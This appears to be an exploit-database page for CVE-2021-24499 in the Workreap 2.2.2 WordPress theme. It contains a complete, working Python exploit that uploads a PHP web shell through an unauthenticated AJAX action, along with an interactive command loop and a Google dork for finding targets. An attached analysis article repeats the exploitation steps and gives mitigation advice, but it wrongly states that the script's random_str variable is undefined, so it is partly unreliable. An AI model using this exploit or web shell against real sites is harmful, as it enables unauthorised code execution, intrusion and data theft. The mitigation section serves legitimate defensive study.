WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution

Exploit Author: Mohammad Hossein Khanaki Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2023-06-09 
# Exploit Title: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
# Dork: inurl:/wp-content/themes/workreap/
# Date: 2023-06-01
# Category : Webapps
# Vendor Homepage: https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454
# Exploit Author: Mohammad Hossein Khanaki(Mr_B0hl00l)
# Version: 2.2.2
# Tested on: Windows/Linux
# CVE: CVE-2021-24499


import requests
import random
import string
import sys


def usage():
    banner = '''
    NAME: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
    usage: python3 Workreap_rce.py <URL> 
    example for linux : python3 Workreap_rce.py https://www.exploit-db.com
    example for Windows : python Workreap_rce.py https://www.exploit-db.com
    '''
    print(f"{BOLD}{banner}{ENDC}")

def upload_file(target):
    print("[ ] Uploading File")
    url = target + "/wp-admin/admin-ajax.php"
    body = "<?php echo '" + random_str + "';?>"
    data = {"action": "workreap_award_temp_file_uploader"}
    response = requests.post(url, data=data, files={"award_img": (file_name, body)})
    if '{"type":"success",' in response.text:
        print(f"{GREEN}[+] File uploaded successfully{ENDC}")
        check_php_file(target)
    else:
        print(f"{RED}[+] File was not uploaded{ENDC}")

def check_php_file(target):
    response_2 = requests.get(target + "/wp-content/uploads/workreap-temp/" + file_name)
    if random_str in response_2.text:
        print(f"{GREEN}The uploaded PHP file executed successfully.{ENDC}")
        print("path: " + target +"/wp-content/uploads/workreap-temp/" + file_name)
        question = input(f"{YELLOW}Do you want get RCE? [Y/n] {ENDC}")
        if question == "y" or question == "Y":
            print("[ ] Uploading Shell ")
            get_rce(target)
        else:
            usage()
    else:
        print(f"{RED}[+] PHP file not allowed on this website. Try uploading another file.{ENDC}")

def get_rce(target):
    file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"
    body = '<?php $command = $_GET["c"]; $output = shell_exec($command); echo "<pre>\n$output</pre>";?>'
    data = {"action": "workreap_award_temp_file_uploader"}
    response_3 = requests.post(target + '/wp-admin/admin-ajax.php', data=data, files={"award_img": (file_name, body)})
    print(f"{GREEN}[+] Shell uploaded successfully{ENDC}")
    while True:
        command = input(f"{YELLOW}Enter a command to execute: {ENDC}")
        print(f"Shell Path : {target}'/wp-content/uploads/workreap-temp/{BOLD}{file_name}?c={command}{ENDC}")
        response_4 = requests.get(target + '/wp-content/uploads/workreap-temp/' + file_name + f"?c={command}")
        print(f"{GREEN}{response_4.text}{ENDC}")


if __name__ == "__main__":
    global GREEN , RED, YELLOW, BOLD, ENDC
    GREEN = '\033[92m'
    RED = '\033[91m'
    YELLOW = '\033[93m'
    BOLD = '\033[1m'
    ENDC = '\033[0m'
    file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"
    random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))
    try:
        upload_file(sys.argv[1])
    except IndexError:
            usage()
    except requests.exceptions.RequestException as e:
        print("\nPlease Enter Valid Address")


WordPress Theme Workreap 2.2.2: Unauthenticated File Upload Vulnerability Leading to Remote Code Execution

One of the most critical security flaws discovered in the WordPress ecosystem involves the Workreap 2.2.2 theme, a popular freelance marketplace theme available on ThemeForest. This vulnerability, identified as CVE-2021-24499, allows attackers to perform unauthenticated file uploads and achieve remote code execution (RCE) without any prior login or authorization. This exploit underscores a fundamental failure in input validation and file handling within a widely used third-party theme.

Overview of the Vulnerability

The vulnerability stems from a misconfigured admin-ajax.php endpoint in the Workreap theme. Specifically, the workreap_award_temp_file_uploader action handler does not enforce proper file type validation, allowing users to upload arbitrary files—including PHP scripts—without authentication.

Attackers can exploit this by sending a POST request to /wp-admin/admin-ajax.php with a custom payload and a file named award_img, which is processed and stored in the /wp-content/uploads/workreap-temp/ directory. Because the uploaded file is treated as a legitimate image, it bypasses security checks, and if the file contains PHP code, it can be executed by the web server.

Exploitation Process

Here is a step-by-step breakdown of how the exploit works:

  • Step 1: Identify Target – Use search engines or tools like Google Dorks to locate sites using the Workreap theme. Example: inurl:/wp-content/themes/workreap/.
  • Step 2: Upload PHP Payload – Send a POST request to /wp-admin/admin-ajax.php with a action=workreap_award_temp_file_uploader and a file upload containing PHP code.
  • Step 3: Verify Execution – Access the uploaded file via /wp-content/uploads/workreap-temp/[filename].php and check if the PHP code executes.
  • Step 4: Establish RCE – Upload a shell script that allows command execution via query parameters (e.g., ?c=ls).

Code Example and Explanation


import requests
import random
import string

def upload_file(target):
    print("[ ] Uploading File")
    url = target + "/wp-admin/admin-ajax.php"
    body = ""
    data = {"action": "workreap_award_temp_file_uploader"}
    response = requests.post(url, data=data, files={"award_img": (file_name, body)})
    if '{"type":"success",' in response.text:
        print(f"{GREEN}[+] File uploaded successfully{ENDC}")
        check_php_file(target)
    else:
        print(f"{RED}[+] File was not uploaded{ENDC}")

This Python script demonstrates the initial file upload phase. The body contains a simple PHP echo statement that outputs a random string. The files={"award_img": (file_name, body)} part sends a file with a custom name and content. The absence of file type filtering allows PHP code to be uploaded as if it were an image.

However, the original script contains a critical flaw: the random_str variable is not defined before being used. This would cause a NameError in Python. The corrected version should define it before use.


random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))

Additionally, the script uses hardcoded color codes (e.g., \033[92m) which may not render properly on all terminals. A more robust approach would use libraries like colorama or implement ANSI escape sequences safely.

Security Implications and Real-World Impact

Due to the unauthenticated nature of this vulnerability, attackers can compromise websites without needing credentials. This is particularly dangerous in shared hosting environments or when the theme is used on public-facing sites with minimal security hardening.

Exploits like this have been used in real-world attacks to:

  • Deploy backdoors for persistent access.
  • Steal sensitive data (e.g., database credentials, user information).
  • Host malicious content (e.g., phishing pages, malware).
  • Perform lateral movement within a network.

Moreover, the vulnerability highlights a broader issue in WordPress theme development: third-party themes often lack proper security audits. Developers may prioritize functionality over security, especially when released through marketplaces like ThemeForest, where quality control is minimal.

Recommendations and Mitigation Strategies

For site administrators and developers, the following measures are essential:

  • Update the Workreap theme immediately to version 2.2.3 or later, which includes fixes for this vulnerability.
  • Disable unused theme functions—especially those tied to AJAX actions that handle file uploads.
  • Restrict file upload directories via .htaccess or server configuration to deny execution of PHP files.
  • Implement file type validation using MIME checks or file extension filtering.
  • Monitor upload directories for suspicious files using intrusion detection systems (IDS).

Technical Best Practices

Security professionals should follow these principles when evaluating or developing WordPress themes:

Best Practice Implementation
Input Validation Always validate file types and content before processing.
File Upload Restrictions Use wp_check_filetype() to verify file types and reject non-image files.
Secure Storage Store uploads in non-web-accessible directories or use a content delivery network (CDN).
Logging and Monitoring Log all file upload events and monitor for anomalies.

Conclusion

The Workreap 2.2.2 vulnerability serves as a stark reminder that even popular, commercially available WordPress themes can introduce severe security risks. The combination of unauthenticated file upload and lack of execution control enables remote code execution with minimal effort.

As the WordPress ecosystem grows, so does the attack surface. Developers and administrators must prioritize security over convenience, especially when integrating third-party components. Regular audits, updates, and defensive configurations are not optional—they are essential.

For those managing WordPress sites, always verify the security of themes and plugins, especially those from external marketplaces. Never assume that a “well-reviewed” theme is inherently safe. The presence of CVE-2021-24499 should be a red flag for immediate action.